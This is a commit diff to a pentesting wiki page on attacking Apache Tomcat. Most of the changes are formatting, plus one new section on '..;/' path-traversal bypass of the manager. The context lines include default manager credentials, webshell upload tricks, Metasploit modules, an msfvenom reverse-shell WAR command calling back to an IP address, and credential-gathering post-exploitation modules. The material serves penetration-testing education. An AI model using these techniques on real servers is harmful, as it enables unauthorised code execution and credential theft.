GitBook: [#2914] No subject

pentesting/pentesting-web/tomcat.md

@@ -16,11 +16,11 @@ msf> use auxiliary/scanner/http/tomcat_enum
 
 ## Default credentials
 
-The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** \(execute code\). But this path is protected by basic HTTP auth, the most common credentials are:
+The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
 
 * admin:admin
 * tomcat:tomcat
-* admin:<NOTHING>
+* admin:\<NOTHING>
 * admin:s3cr3t
 * tomcat:s3cr3t
 * admin:tomcat
@@ -49,12 +49,12 @@ A well-known vulnerability _to_ access the application manager \_\_ is mod\_jk i
 
 In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
 
-Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.  
+Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.\
 To access to backdoor you might also need to use the double urlencode trick.
 
 ### /examples
 
-The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting \(XSS\) injection \(from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)\).
+The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
 
 * /examples/jsp/num/numguess.jsp
 * /examples/jsp/dates/date.jsp
@@ -79,13 +79,21 @@ The following example scripts that come with Apache Tomcat v4.x - v7.x and can b
 * /examples/servlet/SessionExample
 * /tomcat-docs/appdev/sample/web/hello.jsp
 
+### Path Traversal (..;/)
+
+In some **vulnerable versions of Tomcat** you can access to protected directories in Tomcat using the path: `/..;/`
+
+So, for example, you might be able to **access the Tomcat manager** page accessing: `www.vulnerable.com/lalala/..;/manager/html`
+
+**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
+
 ## RCE
 
-Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file \(execute code\)**.
+Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
 
 ### Limitations
 
-You will only be able to deploy a WAR if you have **enough privileges** \(roles: **admin**, **manager** and **manager-script**\). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` \(it vary between versions\) \(see [POST ](tomcat.md#post)section\).
+You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section).
 
 ```bash
 # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
@@ -114,11 +122,11 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
 ```
 
-Then, upload the revshell.war file and access to it \(_/revshell/_\)
+Then, upload the revshell.war file and access to it (_/revshell/_)
 
 ### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
 
-In some scenarios this doesn't work \(for example old versions of sun\)
+In some scenarios this doesn't work (for example old versions of sun)
 
 #### Download
 
@@ -178,7 +186,7 @@ $ jar -cvf ../webshell.war *
 webshell.war is created
 ```
 
-You could also install this \(allows upload, download and command execution\): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
+You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
 
 ## POST
 
@@ -194,4 +202,3 @@ Other ways to gather Tomcat credentials:
 msf> use post/multi/gather/tomcat_gather
 msf> use post/windows/gather/enum_tomcat
 ```
-